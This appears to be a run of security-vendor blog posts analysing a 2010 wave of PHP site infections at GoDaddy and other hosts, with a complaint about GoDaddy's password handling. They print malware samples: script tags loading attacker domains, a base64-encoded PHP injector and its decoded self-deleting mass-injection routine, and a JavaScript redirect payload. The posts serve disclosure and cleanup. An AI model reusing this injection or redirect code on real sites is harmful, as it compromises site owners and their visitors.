Continuing attacks at GoDaddy – Losotrana.com

And it is still not over. Remember the code we found last week that was hacking all the PHP files at GoDaddy?

It is still happening, but now using the losotrana.com domain ( http://losotrana.com/js.php ). This is the script that will show up on your site if you get hacked:

<script src=”http://losotrana.com/js.php”></script>

Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:

http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

You can clean up using this script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

All the sites so far hosted at GoDaddy. If you are signed up with us, our system should have already alerted you (or it will do so very soon). Again, this is not YOUR fault! GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet.

A curiosity is that this Losotrana.com site is hosted at the same domain as holasionweb.com used on the previous attack:

$ host holasionweb.com
holasionweb.com has address 188.165.200.96
$ host Losotrana.com
Losotrana.com has address 188.165.200.96

Also, all domains used on the latest attacks were registered by the same person:

Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

The requests to infect all the files are coming from: 178.32.42.1, which is also faking Google’s referer:

178.32.42.1 - - - "GET www.x.com/simple_production.php HTTP/1.1" 200 57 "-" 
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Update: GoDaddy FTP server seems to be down.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Reply from GoDaddy regarding the latest attacks

GoDaddy just sent us an update. I am glad they are now acknowledging that they have a problem and are looking to fix it. They didn’t give more details to avoid revealing too much and helping the attackers.

No more blaming the users! I am glad with this response and hopefully they will find out what is going on and fix it.

“Early into our investigation, Go Daddy noticed a majority of exploited websites were all running WordPress. After feedback from customers, more attacks and more in-depth analysis, we modified our statement to specify the attacks targeted numerous PHP-based applications, which included WordPress.

Transparency is a core value at Go Daddy. We intend to continue our commitment to communications. There are times, however, when publicly revealing too much, such as specific code from the attack, helps the criminals causing the issue.

We are aggressively collecting data to see how the attack is maturing and to discover ways we can help prevent our customers from being impacted and shut down ‘the bad guys’ altogether. Go Daddy is leading an ongoing effort, working with industry security experts and other top hosting providers.

As part of our investigation, Go Daddy is encouraging customer input about their related website issues, which is why we set up a special form: http://www.GoDaddy.com/securityissue.

Look for further updates from Go Daddy on this topic, at http://Community.GoDaddy.com/support

- Todd Redfoot, Go Daddy Chief Information Security Officer”

Transparency is important and hopefully when they find out what happened they will do a full case study so we can all learn from that (or am I dreaming too much?)

Found code used to inject the malware at GoDaddy

Update: Reply from GoDaddy: http://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

While GoDaddy was busy blaming its users, one of our friends, K evin Reville, got tired of getting hacked and setup a cron script to monitor his site and alert him when new files were added.

What did he found? He found the malware used by the attackers to infect everyone.

Just to be clear: Nothing to do with WordPress. In fact, in one site we were monitoring, nothing got logged related to WordPress, except this script being called and then deleted. We also saw Joomla sites getting hacked and many other web applications.

So what is going on? The attackers are able to create this single PHP file on all the sites and then remotely execute it to infect everything. Once it is done, the script deletes itself.

Analysis:

The script in this situation was called “simple_production.php” (but we heard reports of different names being used). It is a base64 decoded file that looks like this: (see it in full MW:SIPRO:1)

eval(base64_decode(“DQpzZXRfdGltZV9saW1pdCgwKTsNCg0KDQpmdW5jdGlvbiBpbmplY3….

Decoded, this is what it does: (see the full content here)

1-First, removes itself:

$z=$_SERVER["SCRIPT_FILENAME"];
@unlink($z);

2-Encodes the javascript:

$cod=base64_encode(‘< script src=”http://holasionweb.com/oo.php”>
$to_pack=’if(function_exists(\’ob_start\’)&&!isset($GLOBALS[\’mr_n..

3-Scan all directories and add the malware to all php files. After that, prints the number of infected files and exits:

$val=dirname($z);
$totalinjected=0;
echo “Working with $val\n”;
$start_time=microtime(true);
if ($val!=””)inject_in_folder($val);
$end_time=microtime(true)-$start_time;
echo “|Injected| $totalinjected files in $end_time seconds\n”;

So a simple PHP script is doing all this mess. The issue now is how are they able to inject this file on all those sites at GoDaddy. Permissions on most of the sites we checked were correct. It is not a web application bug. What is left is an internal problem at GoDaddy.

If you are a GoDaddy customer that got hacked, send this link to them. Let’s hope for a good response this time.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Last week attacks – Some comments and updates

Last week as a busy one.

First, thousands of GoDaddy sites got hacked with that kdjkfjskdfjlskdjf.com malware.

A few days later, hundreds of Network Solutions sites got hacked by using the php.ini/cgi-bin malware (including the US Treasury site).

The next day, more thousands of sites at different providers (GoDaddy, Dreamhost, hostgator, etc) got hacked with the MW:MROBH:1 malware.

So, what was going on?

Network Solutions attack

The problem at Network Solutions was caused by an internal application used on their hosting platform that allowed the exploit to happen. They fixed it already, so the problem should not reoccur. The number of infected sites was around 500.

GoDaddy

GoDaddy blamed the users (saying they were using old WordPress versions) and didn’t provide us with information regarding what happened. We know that WordPress wasn’t the problem (we saw sites using the latest version getting hacked), so no one knows what happened. Probably thousands of sites got hacked.

DreamHost

DreamHost contacted us and explained that in their platform the issue was caused by a “specific backdoor shell that we’ve seen used in conjunction with a variety of redirect and SEO related hacks.”. Around 500 sites got hacked. Their statement:

We’ve seen a dozen or so examples of this passed to us via support and have researched it ourselves . It seems to be related to a specific backdoor shell that we’ve seen used in conjunction with a variety of redirect and SEO related hacks.

A scan across all our server files for known shells was done across customer HTTP servers and they were deleted . 550 account owners were contacted with notification of the finding of this backdoor shell file and the changing of their related FTP passwords. They were also provided directions for removing some of the common derivative hacks that have been associated with it, including a link to your web site and further directions to make use of SFTP exclusively due to FTP’s inherent security constraints. The great majority of these shells were added (as indicated by file date) in late November and December .

How are they getting in?

The Network Solutions issue was explained and fixed. At Dreamhost, it was a PHP shell. But how about the others? How were the attackers able to inject content on all these sites?

Skyphire (and others), in our comments, mentioned that the infected files had a PHPMyAdmin cookie added, which would indicate a bug (maybe 0-day) on PHPMyAdmin. That would be a possible cause since all those shared hosts are using PHPMyadmin. This is the cookie added:


getCookie("pma_visited_theme1");

We can’t prove it, but we will keep an eye to find out exactly what is going on. Have more info? Let us know.


As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Second round of GoDaddy sites hacked

It seems that a second round of attacks are happening today at GoDaddy and infecting all kind of sites (Joomla, Wordress,etc). Looking at the modification dates on the files, they all happened May 1st (today) during the morning from 1 to 3/4 am.

All of them had the following javascript added to their pages:

script src= http://kdjkfjskdfjlskdjf.com/kp.php

Which looks very similar to the attacks from the last few weeks, but this time using kp.php instead of js.php. Also, many sites that were not infected during the previous batch got hacked now.

This is how this kb.php file looks like:

function setCookie(c_name,value,expiredays)
{
var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays);
document.cookie=c_name+ “=” +escape(value)+ ((expiredays==null) ? “” :
“;expires=”+exdate.toGMTString()); } function getCookie(c_name){
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + “=”);
if (c_start!=-1) { c_start=c_start + c_name.length+1;
c_end=document.cookie.indexOf(“;”,c_start);
if (c_end==-1) c_end=document.cookie.length; return
unescape(document.cookie.substring(c_start,c_end)); } } return “”; } var
name=getCookie(“pma_visited_theme1″); if (name==””){ setCookie(“pma_visited_theme1″,”1″,20);
var
url=”http://www3.workfree36-td.xorg.pl/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG3KXsWYlGhnZWuVmA%3D%3D”; window.top.location.replace(url);
}else{ }

As you can see, very similar to the previous attack, also loading malware from this *.xorg.pl domain…

If your site got hacked, open your index files and look for this string on the top of it:

< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYha
XNzZXQoJEdMT0JBTFNbJ2..

Removing that from all your index files should solve the problem.

If you are using WordPress, all the *.php files inside your themes folder got modified. So, you have to clean them too.

UPDATE 1 – People are starting to complain on the WordPress forums: http://wordpress.org/support/topic/394255.

UPDATE 2tweeted about it saying that it is related only to WordPress. It is affecting all platforms there.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

GoDaddy Security update

My last post GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission got a lot of traction and it reached the ears of the GoDaddy people!

I just got off the phone with Neil Warner, GoDaddy’s CSO (Chief Security Officer) and he explained the situation to me.

First, I was glad that they heard the customers, heard the complains and took the time to look at it. That was his explanation:

  1. They take security serious and spend a lot of money on intrusion/malware detection to protect their customers
  2. They have a security team 24/7 monitoring all their shared/VPS and private servers
  3. When they detect any issue, they try to fix the problem and that’s why they tried to access my box
  4. They store all the passwords encrypted (not one-way hashed which is the recommended), and they can only be retrieved and reversed after a member of the security team opens a ticket and explains the reason for using the password (like to investigate malware)

One thing that made me feel better was that they actually have a process in place to access the passwords and they hold their people accountable for that. Having them encrypted or in clear-text doesn’t make much a difference, if the process to recover them is open to anyone in their staff…

He said that most users like their free incident response and malware removal and the way they deal with security issues.

He also said that they should have contacted me before accessing the box, warning me of the possible malware, and that they will do that from now on (good to know).

I am happy they called and explained the situation. +1 for GoDaddy for being open, explaining the issue and trying to improve.

GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission

*UPDATE: I just got off the phone with Neil Warner, GoDaddy’s CSO (Chief Security Officer) and he explained the situation to me. Check it out: GoDaddy Security update

I have been a GoDaddy user for a while and never had problems with them. In fact, differently than some people, I had great support and service from them.

However, one recent situation is making me change my mind about them…

I have my domains and a bunch of VPS (virtual private servers) with GoDaddy and one of those servers is/was hosting the Sucuri’s official site.

I am a bit paranoid about security and on all my servers I switch the SSHD port to a different one and restrict to only a few IP addresses. On the offical SSH port (tcp 22), I install a honeypot to detect ssh scans and which passwords/users they use (you can see some of my analysis in this post: Honeypot analysis – Looking at SSH scans)

Anyway, early this year I started posting information about web-based malware and a few days after I did that, I saw on my honeypot logs:

Jan 8 06:55:28 d1 sshd[27670]: Failed password for [mygodaddyuser] from 64.202.160.65 port 49271 ssh2
Jan 8 06:55:30 d1 sshd[27670]: Failed password for [mygodaddyuser] from 64.202.160.65 port 49271 ssh2
Jan 8 06:56:38 d1 sshd[28528]: User root from nat-64-202-160-65.ip.secureserver.net not allowed because listed in DenyUsers
Jan 8 06:56:38 d1 sshd[28528]: Failed none for invalid user root from 64.202.160.65 port 50727 ssh2
Jan 8 06:56:53 d1 sshd[28528]: Failed password for invalid user root from 64.202.160.65 port 50727 ssh2
Jan 8 06:56:55 d1 sshd[28528]: Failed password for invalid user root from 64.202.160.65 port 50727 ssh2

And checking my honeypot logs, I saw:

Jan 8 06:55:28 d1 sshd[27670]: hh: user: [mygodaddyuser]|pass: [MYGODADDYPASS]
Jan 8 06:55:30 d1 sshd[27670]: hh: user: [mygodaddyuser]|pass: [MYGODADDYPREVIOUSPASS]
Jan 8 06:56:53 d1 sshd[28528]: hh: user: root|pass: [MYGODADDYPASS]

I was shocked! My first thought was that someone had stolen my GoDaddy password (that I use to login to their web page) and even my previous password! (I had changed my password a few weeks before that).

I quickly ran and started a panic mode incident response, changed passwords and started to look how I got hacked and what was going on, when I decided to look at the IP address that tried to access my box:

$ whois 64.202.160.65
[Querying whois.arin.net]
[whois.arin.net]

OrgName: GoDaddy.com, Inc.
OrgID: GODAD
Address: 14455 N Hayden Road
Address: Suite 226
City: Scottsdale
StateProv: AZ
PostalCode: 85260
Country: US

NetRange: 64.202.160.0 – 64.202.191.255
CIDR: 64.202.160.0/19
NetName: GO-DADDY-SOFTWARE-INC
NetHandle: NET-64-202-160-0-1
Parent: NET-64-0-0-0-0
NetType: Direct Allocation
NameServer: CNS1.SECURESERVER.NET
NameServer: CNS2.SECURESERVER.NET
NameServer: CNS3.SECURESERVER.NET
Comment:
RegDate: 2002-10-22
Updated: 2007-06-14

Hum.. It came from Godaddy’s own network. I was about to send an email to abuse@godaddy.com, whem I got this email:

It has come to our attention that the [your site name] may be infected by malware. We would like to investigate this matter further, however the login credentials we have on file for your server do not allow us access to the server. In order for us to proceed to investigate the possible infection, we require that you provide the proper login credentials to access your server with administrative rights within 48 hours or by January 10th @ 2 pm MST (GMT -0700) by using our “Password Sync” option, or your server will be suspended. To update the logon information, please follow these steps:

Log into your account.
Click on the ‘My Account’ link.
Click on the ‘Dedicated/Virtual Dedicated Servers’ link.
Select the server you need to update the log on information for.
Click on the ‘Open Manager’ link.
Click on the Support: Sync Passwords button.
Enter the current SSH and root information and save the information.

WTF!WTF!WTF! Yes, I cursed them for a while! Why?

  1. They tried to SSH to my “private” server without my authorization!
  2. They wanted my ROOT password and SSH access!
  3. They HAD MY MAIN GODADDY PASSWORD (AND PREVIOUS ONE) in CLEAR-TEXT!
  4. They almost gave me a heart attack

I don’t know if anyone find that horrifying, but I do! I would understand storing the initial password for the server in clear-text or something like that. But the main password from my GoDaddy account? Giving their admins access to them so they can SSH to my box? Keeping my old password in clear-text too? SSHing to my box without asking my first? Wow….

The end of the story… After I calmed down, I contacted them and explained about my web-based malware security research and told that I would not give anyone SSH access. If they really required that I would switched providers. They did some investigation, apologized and let me stay… How nice they are…